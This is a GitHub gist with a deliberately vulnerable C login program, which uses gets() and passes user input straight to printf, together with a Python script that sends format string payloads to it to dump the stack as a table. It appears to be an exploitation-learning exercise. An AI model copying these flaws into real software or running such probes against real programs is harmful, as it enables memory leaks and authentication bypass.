Skip to content

Instantly share code, notes, and snippets.

@p3nj
Last active September 8, 2023 20:23
Show Gist options
  • Save p3nj/57b9736435d5d66f94d7ffa49ba2de09 to your computer and use it in GitHub Desktop.
Save p3nj/57b9736435d5d66f94d7ffa49ba2de09 to your computer and use it in GitHub Desktop.
Python script to generate a GDB-like stack table using the format string vulnerability.
#include <stdio.h>
char passwd[80];
void main()
{
printf("Please enter password: ");
if (login() == 'T')
welcome();
else
quit();
}
int login()
{
int success = 'F';
int *t = &success;
gets(passwd);
printf("Password entered: ");
printf(passwd);
printf("\n");
return *t;
}
void welcome()
{
printf("Welcome, you are logged in!\n");
exit(0);
}
void quit()
{
printf("Sorry, password is incorrect.\n");
exit(1);
}
import subprocess
def get_stack_contents(payload):
process = subprocess.Popen('./fs', stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.stdin.write(payload.encode('utf-8') + b'\n')
process.stdin.flush()
output = process.stdout.read().decode('utf-8')
return output
def generate_stack_table():
table = []
i = 1
zero_count = 0 # Counter for continuous '00000000' occurrences
while True:
payload = 'AAAA:%{}$08x'.format(i)
output = get_stack_contents(payload)
try:
value = output.split('AAAA:')[1].strip().split('\n')[0]
except IndexError:
value = "Invalid index"
table.append((i, value))
# Check if the value is '00000000' and increment the counter
if value == '00000000':
zero_count += 1
else:
zero_count = 0 # Reset the counter if the value is not '00000000'
# Break the loop if '00000000' appears continuously for 10 times
if zero_count == 10:
break
i += 1
return table
# Generate the stack table
stack_table = generate_stack_table()
# Print the stack table in a GDB-like format
print("Index | Value")
print("--------------")
for index, value in stack_table:
print(f"{index:5} | {value}")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment